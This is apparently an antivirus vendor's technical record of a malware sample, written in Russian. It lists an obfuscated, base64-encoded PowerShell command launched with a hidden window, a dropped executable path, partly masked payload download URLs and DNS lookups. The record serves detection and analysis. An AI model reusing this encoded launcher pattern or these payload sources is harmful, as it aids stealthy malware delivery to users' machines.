Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADcAZgB3ADMAcgBtAD0AKAAoACcAWQBzACcAKwAnADQAJwApACsAJwBfACcAKwAoACcAMQBhACcAKwAnAGkAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAG4AdgA6AHUAUwBlAFIAUABSAE8AZgBpAG...
- %HOMEPATH%\ern77cf\asj4cq0\a89u8ma.exe
- %HOMEPATH%\ern77cf\asj4cq0\a89u8ma.exe
- http://we###lavera.com/site/8Xdk6wyg5141/
- http://vb##rgo.hu/sms_mail/attach/uuOkTMUkW/
- http://vu####rkhallen.nl/folder/hlEVHyR/
- http://www.1c#.co.za/beautyschool/xKi/
- http://www.al#####rnetbundles.com/qqp/file/NxbgET/
- http://www.al#####rnetbundles.com/cgi-sys/suspendedpage.cgi
- DNS ASK we###lavera.com
- DNS ASK vb##rgo.hu
- DNS ASK vu####rkhallen.nl
- DNS ASK 1c#.co.za
- DNS ASK al#####rnetbundles.com
- DNS ASK ho####ycc.com.hk
- DNS ASK fu###uggage.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADcAZgB3ADMAcgBtAD0AKAAoACcAWQBzACcAKwAnADQAJwApACsAJwBfACcAKwAoACcAMQBhACcAKwAnAGkAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAG4AdgA6AHUAUwBlAFIAUABSAE8AZgBpAG...' (со скрытым окном)